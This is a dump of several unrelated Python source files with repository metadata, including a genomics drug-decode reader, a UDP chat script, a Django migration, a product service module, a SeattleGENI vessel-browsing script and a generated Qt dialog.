If already populated, replaced by new content.
"""
from gdsctools import COSMICInfo
c = COSMICInfo()
self.df['MEDIA_FACTOR'] = [c.get(x).SCREEN_MEDIUM
for x in self.df.index]
self.found_media = True
if self.colnames.media not in self._special_names:
self._special_names.append(self.colnames.media)
self._order()
def _order(self):
others = [x for x in self.df.columns if x not in self._special_names]
self.df = self.df[self._special_names + others]
def _get_features(self):
return list(self.df.columns)
def _set_features(self, features):
for feature in features:
if feature not in self.features:
raise ValueError('Unknown feature name %s' % feature)
features = [x for x in features if x.endswith('FACTOR') is False]
features = self._special_names + features
self.df = self.df[features]
self._order()
features = property(_get_features, _set_features,
doc="return list of features")
def _get_tissues(self):
return list(self.df[self.colnames.tissue])
tissues = property(_get_tissues, doc='return list of tissues')
def _get_unique_tissues(self):
return list(self.df[self.colnames.tissue].unique())
unique_tissues = property(_get_unique_tissues, doc='return set of tissues')
def plot(self):
"""Histogram of the tissues found
.. plot::
:include-source:
:width: 80%
from gdsctools import GenomicFeatures
gf = GenomicFeatures() # use the default file
gf.plot()
"""
if self.colnames.tissue not in self.df.columns:
return
data = pd.get_dummies(self.df[self.colnames.tissue]).sum()
data.index = [x.replace("_", " ") for x in data.index]
# deprecated but works for python 3.3
        try:
            data = data.sort_values(ascending=False)
        except Exception:
            data.sort(ascending=False)  # older pandas: in-place sort
pylab.figure(1)
pylab.clf()
labels = list(data.index)
pylab.pie(data, labels=labels)
pylab.figure(2)
data.plot(kind='barh')
pylab.grid()
pylab.xlabel('Occurences')
# keep the try to prevent MacOS issue
try:pylab.tight_layout()
except:pass
return data
def __str__(self):
txt = 'Genomic features distribution\n'
try:
tissues = list(self.df[self.colnames.tissue].unique())
Ntissue = len(tissues)
txt += 'Number of unique tissues {0}'.format(Ntissue)
if Ntissue == 1:
txt += ' ({0})\n'.format(tissues[0])
elif Ntissue < 10:
txt += '\nHere are the tissues: '
txt += ",".join(tissues) + "\n"
else:
txt += '\nHere are the first 10 tissues: '
txt += ", ".join(tissues[0:10]) + "\n"
except:
txt += 'No information about tissues\n'
if self.found_msi:
txt += "MSI column: yes\n"
else:
txt += "MSI column: no\n"
if self.found_media:
txt += "MEDIA column: yes\n"
else:
txt += "MEDIA column: no\n"
# -3 since we have also the MSI, tissue, media columns
# TODO should use shift attribute ?
Nfeatures = len(self.features)
txt += '\nThere are {0} unique features distributed as\n'.format(Nfeatures-self.shift)
n_mutations = len([x for x in self.df.columns if x.endswith("_mut")])
txt += "- Mutation: {}\n".format(n_mutations)
n_gain = len([x for x in self.df.columns if x.startswith("gain_cna")])
txt += "- CNA (gain): {}\n".format(n_gain)
n_loss = len([x for x in self.df.columns if x.startswith("loss_cna")])
txt += "- CNA (loss): {}".format(n_loss)
return txt
def drop_tissue_in(self, tissues):
"""Drop tissues from the list
:param list tissues: a list of tissues to drop. If you have only
one tissue, can be provided as a string. Since rows are removed
some features (columns) may now be empty (all zeros). If so, those
columns are dropped (except for the special columns (e.g, MSI).
"""
tissues = easydev.to_list(tissues)
mask = self.df[self.colnames.tissue].isin(tissues) == False
self.df = self.df[mask]
self._cleanup()
def keep_tissue_in(self, tissues):
"""Drop tissues not in the list
:param list tissues: a list of tissues to keep. If you have only
one tissue, can be provided as a string. Since rows are removed
some features (columns) may now be empty (all zeros). If so, those
columns are dropped (except for the special columns (e.g, MSI).
"""
tissues = easydev.to_list(tissues)
mask = self.df[self.colnames.tissue].isin(tissues)
self.df = self.df[mask]
self._cleanup()
def _cleanup(self, required_features=0):
# FIXME: there is view/copy warning here in pandas. it should be fixed
# or may have side-effects
to_ignore = self._special_names
# create a view ignoring the informative columns
view = self.df[[x for x in self.df.columns if x not in to_ignore]]
todrop = list(view.columns[view.sum() <= required_features])
self.df.drop(todrop, axis=1, inplace=True)
def __repr__(self):
Nc = len(self.cosmicIds)
Nf = len(self.features) - self.shift
try:
Nt = len(set(self.tissues))
except:
Nt = '?'
return "GenomicFeatures <Nc={0}, Nf={1}, Nt={2}>".format(Nc, Nf, Nt)
def compress_identical_features(self):
"""Merge duplicated columns/features
Columns duplicated are merged as follows. Fhe first column is kept,
others are dropped but to keep track of those dropped, the column name
is renamed by concatenating the columns's names. The separator is a
double underscore.
::
gf = GenomicFeatures()
gf.compress_identical_features()
# You can now access to the column as follows (arbitrary example)
gf.df['ARHGAP26_mut__G3BP2_mut']
"""
# let us identify the duplicates as True/False
datatr = self.df.transpose()
duplicated_no_first = datatr[datatr.duplicated()]
try:
duplicated = datatr[datatr.duplicated(keep=False)]
except:
# pandas 0.16
duplicated = datatr[datatr.duplicated(take_last=False)]
tokeep = [x for x in duplicated.index if x not in duplicated_no_first.index]
# Let us create a groupby strategy
groups = {}
# Let us now add the corrsponding duplicats
for feature in tokeep:
# Find all row identical to this feature
matches = (duplicated.ix[feature] == duplicated).all(axis=1)
groups[feature] = "__".join(duplicated.index[matches])
# This drops all duplicated columns (the first is kept, others are
# dropped)
self.df = self.df.transpose().drop_duplicates().transpose()
self.df.rename(columns=groups, inplace=True)
# We want to keep the column names informative that is if there were
# duplicates, we rename the column kept with the concatenation of all
# the corresponding duplicates
print("compressed %s groups of duplicates" % len(groups))
return groups
def get_TCGA(self):
from gdsctools.cosmictools import COSMICInfo
c = COSMICInfo()
tcga = c.df.ix[self.df.index].TCGA
return tcga
class PANCAN(Reader):
"""Reads RData file wit all genomic features including methylation.
will be removed. Used to read original data in R format but
will provide the data as CSV or TSV
.. deprecated:: since v0.12
"""
def __init__(self, filename=None):
print('deprecated')
"""if filename is None:
filename = easydev.get_share_file('gdsctools', 'data',
'PANCAN_simple_MOBEM.rdata')
super(PANCAN, self).__init__(filename)
# Remove R dependencies
from biokit.rtools import RSession
self.session = RSession()
self.session.run('load("%s")' %self._filename)
self.df = self._read_matrix_from_r('MoBEM')
"""
class Extra(Reader):
def __init__(self, filename="djvIC50v17v002-nowWithRMSE.rdata"):
super(Extra, self).__init__(filename)
print("Deprecated since v0.12")
# Remove R dependencies
from biokit.rtools import RSession
self.session = RSession()
self.session.run('load("%s")' %self._filename)
# 3 identical matrices containing AUC, IC50 and
self.dfAUCv17= self._read_matrix_from_r('dfAUCv17')
self.dfIC50v17 = self._read_matrix_from_r('dfIC50v17')
# Residual
self.dfResv17 = self._read_matrix_from_r('dfResv17')
# This df holds the xmid/scale parameters for each cell line
# Can be visualised using the tools.Logistic class.
self.dfCL= self._read_matrix_from_r('dfCL')
# There is an extra matrix called MoBEM, which is the same as in the
# file
def hist_residuals(self, bins=100):
"""Plot residuals across all drugs and cell lines"""
data = [x for x in self.dfResv17.fillna(0).values.flatten() if x != 0]
pylab.clf()
pylab.hist(data, bins=bins, normed=True)
pylab.grid(True)
pylab.xlabel('Residuals')
pylab.ylabel(r'\#')
def scatter(self):
from biokit.viz import scatter
s = scatter.ScatterHist(self.dfCL)
s.plot(kargs_histx={'color':'red', 'bins':20},
kargs_scatter={'alpha':0.9, 's':100, 'c':'b'},
kargs_histy={'color':'red', 'bins':20})
def hist_ic50(self, bins=100):
data = [x for x in self.dfIC50v17.fillna(0).values.flatten() if x != 0]
pylab.clf()
pylab.hist(data, bins=bins, normed=True)
pylab.grid(True)
pylab.xlabel('IC50')
pylab.ylabel(r'\#')
def hist_auc(self, bins=100):
data = [x for x in self.dfAUCv17.fillna(0).values.flatten() if x != 0]
pylab.clf()
pylab.hist(data, bins=bins, normed=True)
pylab.grid(True)
pylab.xlabel('AUC')
pylab.ylabel(r'\#')
class DrugDecode(Reader):
"""Reads a "drug decode" file
    The format must be a comma-separated file. There are 3 compulsory columns
called DRUG_ID, DRUG_NAME and DRUG_TARGET. Here is an example::
DRUG_ID ,DRUG_NAME ,DRUG_TARGET
999 ,Erlotinib ,EGFR
1039 ,SL 0101-1 ,"RSK, AURKB, PIM3"
TSV file may also work out of the box. If a column name called
'PUTATIVE_TARGET' is found, it is renamed 'DRUG_TARGET' to be compatible with
earlier formats.
In addition, 3 extra columns may be provided::
- PUBCHEM_ID
- WEBRELEASE
- OWNED_BY
The OWNED_BY and WEBRELEASE may be required to create packages for each
company. If those columns are not provided, the internal dataframe is
filled with None.
Note that older version of identifiers such as::
Drug_950_IC50
are transformed as proper ID that is (in this case), just the number::
950
Then, the data is accessible as a dataframe, the index being the
DRUG_ID column::
data = DrugDecode('DRUG_DECODE.csv')
data.df.ix[999]
.. note:: the DRUG_ID column must be made of integer
"""
def __init__(self, filename=None):
""".. rubric:: Constructor"""
super(DrugDecode, self).__init__(filename)
self.header = ['DRUG_ID', 'DRUG_NAME', 'DRUG_TARGET', 'OWNED_BY',
'WEBRELEASE']
self.header_extra = ["PUBCHEM_ID", "CHEMBL_ID", "CHEMSPIDER_ID"]
try:
# if the input data is already a DrugDecode instance, this should
# fail since the expected df will not have the DRUG_ID field, that
# should be the index
self._interpret()
except:
pass
self.df = self.df[sorted(self.df.columns)]
def _interpret(self, filename=None):
N = len(self.df)
if N == 0:
return
self.df.rename(columns={
'PUTATIVE_TARGET': 'DRUG_TARGET',
'THERAPEUTIC_TARGET': 'DRUG_TARGET'},
inplace=True)
for column in ["WEBRELEASE", "OWNED_BY"] + self.header_extra:
if column not in self.df.columns:
self.df[column] = [np.nan] * N
#for this in self.header[1:]:
for this in self.header:
msg = " The column %s was not found and may be an issue later on."
if this not in self.df.columns and this != self.df.index.name:
                colorlog.warning(msg % this)
# Finally, set the drug ids as the index.
try:
self.df.set_index('DRUG_ID', inplace=True)
except:
# could be done already
pass
self.df.index = [drug_name_to_int(x) for x in self.df.index]
self.df.index = self.df.index.astype(int)
self.df.index.name = "DRUG_ID"
# sort the columns
try:
self.df.sort_index(inplace=True)
except:
self.df = self.df.ix[sorted(self.df.index)]
self._check_uniqueness(self.df.index)
def _get_names(self):
return list(self.df.DRUG_NAME.values)
drug_names = property(_get_names)
def _get_target(self):
return list(self.df.DRUG_TARGET.values)
drug_targets = property(_get_target)
def _get_drug_ids(self):
return list(self.df.index)
drugIds = property(_get_drug_ids,
doc="return list of drug identifiers")
def _get_row(self, drug_id, colname):
if drug_id in self.df.index:
return self.df.ix[drug_id][colname]
elif str(drug_id).startswith("Drug_"):
try:
drug_id = int(drug_id.split("_")[1])
except:
print("DRUG ID %s not recognised" % drug_id)
return
if drug_id in self.df.index:
return self.df[colname].ix[drug_id]
elif "_" in str(drug_id):
try:
drug_id = int(drug_id.split("_")[0])
except:
print("DRUG ID %s not recognised" % drug_id)
return
if drug_id in self.df.index:
return self.df[colname].ix[drug_id]
else:
return
def get_name(self, drug_id):
return self._get_row(drug_id, 'DRUG_NAME')
def get_target(self, drug_id):
return self._get_row(drug_id, 'DRUG_TARGET')
def is_public(self, drug_id):
return self._get_row(drug_id, 'WEBRELEASE')
def check(self):
for x in self.drugIds:
try:
x += 1
except TypeError as err:
print("drug identifiers must be numeric values")
raise err
# it may happen that a drug has no target in the database ! so we
# cannot check that for the moment:
#if self.df.isnull().sum().sum()>0:
# print(d.df.isnull().sum())
# raise ValueError("all values must be non-na. check tabulation")
def get_info(self):
# Note that there are 4 cases : Y, N, U (unknown?) and NaN
dd = { 'N': len(self),
'N_public': sum(self.df.WEBRELEASE == 'Y'),
'N_prop': sum(self.df.WEBRELEASE != 'Y')}
return dd
def __len__(self):
return len(self.df)
def __str__(self):
txt = "Number of drugs: %s\n" % len(self.df)
return txt
def __repr__(self):
txt = self.__str__()
if len(self.companies):
txt += "Contains %s companies" % len(self.companies)
return txt
def _get_companies(self):
if 'OWNED_BY' in self.df.columns:
companies = list(self.df.OWNED_BY.dropna().unique())
else:
companies = []
return sorted(companies)
companies = property(_get_companies)
def drug_annotations(self, df):
"""Populate the drug_name and drug_target field if possible
:param df: input dataframe as given by e.g., :meth:`anova_one_drug`
:return df: same as input but with the FDR column populated
"""
if len(self.df) == 0:
return df
# print("Nothing done. DrugDecode is empty.")
# aliases
if 'DRUG_ID' not in df.columns:
raise ValueError('Expected column named DRUG_ID but not found')
drug_names = [self.get_name(x) for x in df.DRUG_ID.values]
drug_target = [self.get_target(x) for x in df.DRUG_ID.values]
# this is not clean. It works but could be simpler surely.
df['DRUG_NAME'] = drug_names
df['DRUG_TARGET'] = drug_target
return df
def __add__(self, other):
"""
        Fill missing values but do not overwrite existing fields even if
        the field in the other DrugDecode instance is different.
        """
        # Probably not efficient but will do for now
columns = list(self.df.columns)
dd = DrugDecode()
dd.df = self.df.copy()
        # add missing entries
        missing = [x for x in other.df.index if x not in self.df.index]
        dd.df = pd.concat([dd.df, other.df.loc[missing]])
# merge existing ones
for index, ts in other.df.iterrows():
# add the drug if not already present
if index in self.df.index:
# here it is found in the 2 instances but
# they may contain either complementary data, which
# could have been done with pandas.merge but we wish
# to check for incompatible data
for column in columns:
                a = dd.df.loc[index, column]
                b = ts[column]
                if pd.isnull(b):
                    # nothing to do if b is NULL
                    pass
                elif pd.isnull(a):
# we can merge the content of b into a
# that is the content of other into this instance
dd.df.loc[index,column] = b
else:
# a and b are not null
if a != b:
print('WARNING: different fields in drug %s (%s %s %s)' % (index, column, a, b))
return dd
def __eq__(self, other):
try:
            return (self.df.fillna(0) == other.df.fillna(0)).all().all()
        except Exception:
            return False
def get_public_and_one_company(self, company):
"""Return drugs that belong to a specific company and public drugs"""
drug_decode_company = self.df.query(
"WEBRELEASE=='Y' or OWNED_BY=='%s'" % company)
# Transform into a proper DrugDecode class for safety
return DrugDecode(drug_decode_company)
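if __name__ == "__main__":
    # Minimal usage sketch (assumptions: "drug_decode.csv" is a decode table
    # with DRUG_ID, DRUG_NAME and DRUG_TARGET columns, and the constructor
    # accepts such a file or a dataframe, as get_public_and_one_company()
    # above suggests).
    dd = DrugDecode("drug_decode.csv")
    print(dd)                          # "Number of drugs: ..."
    print(dd.drugIds[:5])              # first few numeric identifiers
    print(dd.get_name(dd.drugIds[0]))  # DRUG_NAME lookup by identifier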
| [
"[email protected]"
] | |
4d4bf41cfc6668556e18405c2b1da9e6f85f8787 | e0e96b8d26cd12c16a3e4a6265b6bceb11c4b1f0 | /17day/updtest.py | 2d6ca62c4a6dff1d92723fc2cea303250088b3cf | [] | no_license | superwenqistyle/2-2018python | 4419bc4ae4700e5b7839c4974106e03fc33e85f8 | 76e5ea72413abfa774ad61b3bdff76eba0c5e16c | refs/heads/master | 2020-03-13T11:08:50.860361 | 2018-05-22T11:17:39 | 2018-05-22T11:17:39 | 131,096,306 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 713 | py | from socket import *
from threading import Thread
from time import ctime
Id=""
port=0
updSocket=None
def send():
while True:
        message = input("Enter a message: ")
        updSocket.sendto(message.encode("gb2312"), (Id, port))
def receive():
    while True:
        content = updSocket.recvfrom(1024)
        print("%s-%s\nEnter a message: " % (content[0].decode("gb2312"), content[1][0]), end="")
def main():
global Id
global port
global updSocket
Id = input("输入对方的id:")
port = int(input("输入对方的端口号:"))
updSocket = socket(AF_INET,SOCK_DGRAM)
updSocket.bind(("",6666))
t = Thread(target=send)
t1 = Thread(target=receive)
t.start()
t1.start()
t.join()
t1.join()
if __name__ == "__main__":
main()
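# Usage sketch (assumption: two hosts on one network, both running this
# script): each side binds UDP port 6666, enters the peer's IP and port when
# prompted, and the send/receive threads then exchange gb2312-encoded
# messages in both directions.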
| [
"[email protected]"
] | |
1626df6646682430eb9d47c57614e0fc6c70476f | 194124b184101bbeb18c00482a1f60a6dd32eebf | /blog/migrations/0002_category.py | a811ab55f0b35be64c8208579dfff5eb7e36a19a | [] | no_license | fc-wsd/s4-instablog | 2fc758461f09fe124b28d86d29d4df429ef72040 | 8e38b07fe7dae0378fda228f2cfa7752f93254c9 | refs/heads/master | 2021-01-10T12:13:09.293036 | 2015-12-12T06:13:34 | 2015-12-12T06:13:34 | 45,733,935 | 2 | 2 | null | null | null | null | UTF-8 | Python | false | false | 660 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('blog', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Category',
fields=[
('id', models.AutoField(verbose_name='ID', auto_created=True, serialize=False, primary_key=True)),
('name', models.CharField(max_length=200)),
('created_at', models.DateTimeField(auto_now_add=True)),
('updated_at', models.DateTimeField(auto_now=True)),
],
),
]
| [
"[email protected]"
] | |
abeeec02fe789c788714f86d5410f5b957b7b6c1 | 53fab060fa262e5d5026e0807d93c75fb81e67b9 | /backup/user_276/ch49_2019_04_04_15_20_35_762666.py | 9d3cc6514e971164771488683d6fcc0b8efa07d7 | [] | no_license | gabriellaec/desoft-analise-exercicios | b77c6999424c5ce7e44086a12589a0ad43d6adca | 01940ab0897aa6005764fc220b900e4d6161d36b | refs/heads/main | 2023-01-31T17:19:42.050628 | 2020-12-16T05:21:31 | 2020-12-16T05:21:31 | 306,735,108 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 106 | py | a = input('Digite um número inteiro positivo: )
lista = []
while a > 0:
lista.append(a)
print[ : :-1] | [
"[email protected]"
] | |
01b828d2865b4a3207556680e892c62aa6f28e15 | 2b468b1d22ecc5668529255676a1d43936829074 | /codes/personal_backend/tuoen/abs/service/product/__init__.py | 43853f724363e33396251d2f10c21af53b191a1a | [] | no_license | MaseraTiGo/4U | 5ac31b4cccc1093ab9a07d18218c3d8c0157dc9c | f572830aa996cfe619fc4dd8279972a2f567c94c | refs/heads/master | 2023-07-26T09:44:21.014294 | 2023-07-13T03:43:34 | 2023-07-13T03:43:34 | 149,217,706 | 0 | 0 | null | 2020-06-05T20:38:16 | 2018-09-18T02:34:29 | Python | UTF-8 | Python | false | false | 3,304 | py | # coding=UTF-8
'''
Created on 2016-07-22
@author: Administrator
'''
import hashlib
import datetime
import json
import random
from django.db.models import Q
from tuoen.sys.core.exception.business_error import BusinessError
from tuoen.sys.utils.common.split_page import Splitor
from model.models import ProductModel
from model.models import Product
class ProductOperateServer(object):
@classmethod
def add(cls, **attrs):
"""add new product"""
        if Product.query(name=attrs['name']):
            raise BusinessError("product name already exists")
        product = Product.create(**attrs)
        if not product:
            raise BusinessError("failed to add product")
@classmethod
def update(cls, **attrs):
"""修改产品信息"""
if 'name' in attrs:
name = attrs['name']
id_qs = [p.id for p in Product.query(name=name)]
if id_qs and attrs['id'] not in id_qs:
raise BusinessError("产品名称已存在")
product = Product().update(**attrs)
return product
@classmethod
def search(cls, current_page, **search_info):
"""查询产品列表"""
if 'keyword' in search_info:
keyword = search_info.pop('keyword')
product_qs = Product.search(**search_info).filter(Q(name__contains = keyword) | \
Q(id__contains = keyword))
else:
product_qs = Product.search(**search_info)
product_qs = product_qs.order_by("-create_time")
return Splitor(current_page, product_qs)
@classmethod
def remove(cls, **attrs):
"""移除产品型号"""
id = attrs['id']
Product.query(id=id).delete()
return True
class ProductModelServer(object):
@classmethod
def add(cls, **attrs):
"""add new product model"""
        if ProductModel.query(name=attrs['name']):
            raise BusinessError("product model already exists")
        product_id = attrs['product']
        product = Product.get_byid(product_id)
        attrs.update({"product": product})
        product_model = ProductModel.create(**attrs)
        if not product_model:
            raise BusinessError("failed to add product model")
@classmethod
def update(cls, **attrs):
"""修改产品型号信息"""
product = ProductModel.query(id=attrs['id'])[0].product
attrs.update({'product': product})
if 'name' in attrs:
name = attrs['name']
product__model_ids = [pm.id for pm in ProductModel.query(name=name)]
if product__model_ids and attrs['id'] not in product__model_ids:
raise BusinessError("产品型号已存在")
product__model = ProductModel().update(**attrs)
return product__model
@classmethod
def search(cls, **search_info):
""""查询产品型号"""
product_id = search_info.pop('id')
product = Product.get_byid(product_id)
product_model_qs = ProductModel.search(product=product)
product_model_qs = product_model_qs.order_by("-create_time")
return product_model_qs
@classmethod
def remove(cls, **attrs):
"""移除产品型号"""
id = attrs['id']
ProductModel.query(id=id).delete()
return True | [
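# Usage sketch (hypothetical ids/names; assumes the Django app and the model
# layer imported above are configured):
#     ProductOperateServer.add(name="demo product")
#     page = ProductOperateServer.search(1, keyword="demo")  # Splitor page
#     ProductModelServer.add(product=1, name="demo model")
#     ProductModelServer.remove(id=1)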
"[email protected]"
] | |
919890dfa27b2785488ab4ec815c2d7c9bf0faa7 | 9cac3bc1c61f4de32251072e49c50b0543450490 | /examples/find_available_seattlegeni_vessels.py | 412176990dffaec0800a9c6acb8ef925e3c14bd2 | [
"MIT"
] | permissive | SeattleTestbed/experimentmanager | 40b036028809fa77dcdec804d58853f679e326de | 31c52f35fba1e367b1177b3a95ae65b4dd0e1a1c | refs/heads/master | 2020-12-25T17:34:49.713296 | 2017-05-15T11:37:36 | 2017-05-15T11:37:36 | 20,136,879 | 0 | 5 | null | 2016-08-29T09:00:07 | 2014-05-24T18:43:36 | Python | UTF-8 | Python | false | false | 4,356 | py | """
This script will look up all active nodes that are part of a testbed managed
by SeattleGENI and determine which vessels on those nodes are available.
This information could be used in various ways, one of them being to gather
information about those node locations, such as latency from a certain
location, and decide which vessels to acquire based on that information.
Note: This script can result in a large amount of node communication.
Specifically, it will try to communicate with every node that is part of
the testbed.
Example output of this script:
Number of advertising nodes: 452
DEBUG: only looking at 5 nodes.
Failure on NAT$2dfeca92a68744eb493cf5ba5559cdcee03684c5v2:1224: Connection Refused! ['[Errno 111] Connection refused']
On 1.1.1.1:1224 found 6 available vessels
On 4.4.4.4:1224 found 6 available vessels
On 3.3.3.3:1224 found 5 available vessels
Failure on 2.2.2.2:1224: timed out
Number of nodes that SeattleGENI vessels are available on: 3
"""
import sys
import traceback
# If this script resides outside of the directory that contains the seattlelib
# files and experimentlib.py, then you'll need to set that path here.
EXPERIMENTLIB_DIRECTORY = "./experimentlibrary/"
sys.path.append(EXPERIMENTLIB_DIRECTORY)
import experimentlib
# This can be used to adjust how many threads are used for concurrently
# contacting nodes when experimentlib.run_parallelized() is called.
#experimentlib.num_worker_threads = 10
# The public key that all seattlegeni nodes advertise under.
SEATTLECLEARINGHOUSE_PUBLICKEY_FILENAME = "seattlegeni_advertisement.publickey"
# Useful for development. Only contact this many nodes.
MAX_NODES_TO_LOOK_AT = 5
def main():
identity = experimentlib.create_identity_from_key_files(SEATTLECLEARINGHOUSE_PUBLICKEY_FILENAME)
nodelocation_list = experimentlib.lookup_node_locations_by_identity(identity)
print("Number of advertising nodes: " + str(len(nodelocation_list)))
if MAX_NODES_TO_LOOK_AT is not None:
print("DEBUG: only looking at " + str(MAX_NODES_TO_LOOK_AT) + " nodes.")
nodelocation_list = nodelocation_list[:MAX_NODES_TO_LOOK_AT]
# Talk to each nodemanager to find out vessel information.
browse_successlist, failurelist = \
experimentlib.run_parallelized(nodelocation_list, browse_node_for_available_vessels)
# Create a dictionary whose keys are the nodeids and values are lists of
# vesseldicts of the available vessels on that node.
available_vesseldicts_by_node = {}
for (nodeid, available_vesseldicts) in browse_successlist:
if available_vesseldicts:
available_vesseldicts_by_node[nodeid] = available_vesseldicts
print("Number of nodes that SeattleGENI vessels are available on: " +
str(len(available_vesseldicts_by_node.keys())))
def browse_node_for_available_vessels(nodelocation):
"""
Contact the node at nodelocation and return a list of vesseldicts
for each vessel on the node.
"""
try:
# Ask the node for information about the vessels on it.
vesseldict_list = experimentlib.browse_node(nodelocation)
# Gather up a list of vesseldicts of the available vessels.
available_vesseldict_list = []
for vesseldict in vesseldict_list:
if is_vessel_available(vesseldict):
available_vesseldict_list.append(vesseldict)
# Just so we can watch the progress, print some output.
# We display the nodelocation rather than the nodeid because it's more
# interesting to look at, even though nodes can change location and this
# isn't a unique identifier of the node.
print("On " + nodelocation + " found " +
str(len(available_vesseldict_list)) + " available vessels")
return available_vesseldict_list
  except experimentlib.NodeCommunicationError as e:
    print("Failure on " + nodelocation + ": " + str(e))
  except Exception:
    traceback.print_exc()
def is_vessel_available(vesseldict):
"""
This returns True or False depending on whether the vesseldict indicates an
an available vessel. That is, one that can be acquired through SeattleGENI.
"""
if vesseldict['vesselname'] == 'v2':
# v2 is a special vessel that will never be available from SeattleGENI.
return False
else:
# If there are no userkeys, the vessel is available.
return len(vesseldict['userkeys']) == 0
if __name__ == "__main__":
main()
| [
"USER@DOMAIN"
] | USER@DOMAIN |
871588cf841884f7fc798cea219e466dad82e5ed | c123cb27fbb807acbc4a8bc6148e539dc8c3c3a3 | /view/Ui_CadastrePageReportDialog.py | bf2daf3ef71c709552d9ebe8c80c5b11dea33fb7 | [] | no_license | ankhbold/lm3_mgis | 0b1e5498adc3d556b7ea0656ae9fdc02c47fc0f7 | a2b4fbdcf163662c179922698537ea9150ba16e5 | refs/heads/master | 2020-08-06T20:17:49.049160 | 2019-10-08T05:35:05 | 2019-10-08T05:35:05 | 213,139,587 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,886 | py | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'D:\work\LAND_MANAGER\lm2\view\CadastrePageReportDialog.ui.'
#
# Created by: PyQt5 UI code generator 4.11.4
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui
try:
_fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
def _fromUtf8(s):
return s
try:
_encoding = QtGui.QApplication.UnicodeUTF8
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig, _encoding)
except AttributeError:
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig)
class Ui_CadastrePageReportDialog(object):
def setupUi(self, CadastrePageReportDialog):
CadastrePageReportDialog.setObjectName(_fromUtf8("CadastrePageReportDialog"))
CadastrePageReportDialog.resize(732, 453)
self.close_button = QtGui.QPushButton(CadastrePageReportDialog)
self.close_button.setGeometry(QtCore.QRect(650, 410, 75, 23))
self.close_button.setObjectName(_fromUtf8("close_button"))
self.find_button = QtGui.QPushButton(CadastrePageReportDialog)
self.find_button.setGeometry(QtCore.QRect(450, 59, 75, 23))
self.find_button.setObjectName(_fromUtf8("find_button"))
self.cpage_twidget = QtGui.QTableWidget(CadastrePageReportDialog)
self.cpage_twidget.setGeometry(QtCore.QRect(10, 110, 718, 292))
self.cpage_twidget.setObjectName(_fromUtf8("cpage_twidget"))
self.cpage_twidget.setColumnCount(7)
self.cpage_twidget.setRowCount(0)
item = QtGui.QTableWidgetItem()
self.cpage_twidget.setHorizontalHeaderItem(0, item)
item = QtGui.QTableWidgetItem()
self.cpage_twidget.setHorizontalHeaderItem(1, item)
item = QtGui.QTableWidgetItem()
self.cpage_twidget.setHorizontalHeaderItem(2, item)
item = QtGui.QTableWidgetItem()
self.cpage_twidget.setHorizontalHeaderItem(3, item)
item = QtGui.QTableWidgetItem()
self.cpage_twidget.setHorizontalHeaderItem(4, item)
item = QtGui.QTableWidgetItem()
self.cpage_twidget.setHorizontalHeaderItem(5, item)
item = QtGui.QTableWidgetItem()
self.cpage_twidget.setHorizontalHeaderItem(6, item)
self.results_label = QtGui.QLabel(CadastrePageReportDialog)
self.results_label.setGeometry(QtCore.QRect(10, 90, 201, 16))
self.results_label.setText(_fromUtf8(""))
self.results_label.setObjectName(_fromUtf8("results_label"))
self.print_button = QtGui.QPushButton(CadastrePageReportDialog)
self.print_button.setGeometry(QtCore.QRect(550, 410, 75, 23))
self.print_button.setObjectName(_fromUtf8("print_button"))
self.line = QtGui.QFrame(CadastrePageReportDialog)
self.line.setGeometry(QtCore.QRect(0, 20, 731, 16))
self.line.setFrameShape(QtGui.QFrame.HLine)
self.line.setFrameShadow(QtGui.QFrame.Sunken)
self.line.setObjectName(_fromUtf8("line"))
self.line_2 = QtGui.QFrame(CadastrePageReportDialog)
self.line_2.setGeometry(QtCore.QRect(0, 430, 731, 16))
self.line_2.setFrameShape(QtGui.QFrame.HLine)
self.line_2.setFrameShadow(QtGui.QFrame.Sunken)
self.line_2.setObjectName(_fromUtf8("line_2"))
self.label_2 = QtGui.QLabel(CadastrePageReportDialog)
self.label_2.setGeometry(QtCore.QRect(10, 10, 281, 16))
self.label_2.setObjectName(_fromUtf8("label_2"))
self.print_year_chbox = QtGui.QCheckBox(CadastrePageReportDialog)
self.print_year_chbox.setGeometry(QtCore.QRect(330, 40, 101, 17))
self.print_year_chbox.setObjectName(_fromUtf8("print_year_chbox"))
self.print_year_sbox = QtGui.QSpinBox(CadastrePageReportDialog)
self.print_year_sbox.setEnabled(False)
self.print_year_sbox.setGeometry(QtCore.QRect(330, 59, 91, 22))
self.print_year_sbox.setMinimum(2000)
self.print_year_sbox.setMaximum(2100)
self.print_year_sbox.setProperty("value", 2017)
self.print_year_sbox.setObjectName(_fromUtf8("print_year_sbox"))
self.label_3 = QtGui.QLabel(CadastrePageReportDialog)
self.label_3.setGeometry(QtCore.QRect(10, 40, 171, 16))
self.label_3.setObjectName(_fromUtf8("label_3"))
self.person_id_edit = QtGui.QLineEdit(CadastrePageReportDialog)
self.person_id_edit.setGeometry(QtCore.QRect(10, 60, 150, 20))
self.person_id_edit.setObjectName(_fromUtf8("person_id_edit"))
self.parcel_id_edit = QtGui.QLineEdit(CadastrePageReportDialog)
self.parcel_id_edit.setGeometry(QtCore.QRect(170, 60, 150, 20))
self.parcel_id_edit.setObjectName(_fromUtf8("parcel_id_edit"))
self.label_4 = QtGui.QLabel(CadastrePageReportDialog)
self.label_4.setGeometry(QtCore.QRect(170, 40, 151, 16))
self.label_4.setObjectName(_fromUtf8("label_4"))
self.retranslateUi(CadastrePageReportDialog)
QtCore.QMetaObject.connectSlotsByName(CadastrePageReportDialog)
def retranslateUi(self, CadastrePageReportDialog):
CadastrePageReportDialog.setWindowTitle(_translate("CadastrePageReportDialog", "Dialog", None))
self.close_button.setText(_translate("CadastrePageReportDialog", "close", None))
self.find_button.setText(_translate("CadastrePageReportDialog", "Find", None))
item = self.cpage_twidget.horizontalHeaderItem(0)
item.setText(_translate("CadastrePageReportDialog", "ID", None))
item = self.cpage_twidget.horizontalHeaderItem(1)
item.setText(_translate("CadastrePageReportDialog", "PrintDate", None))
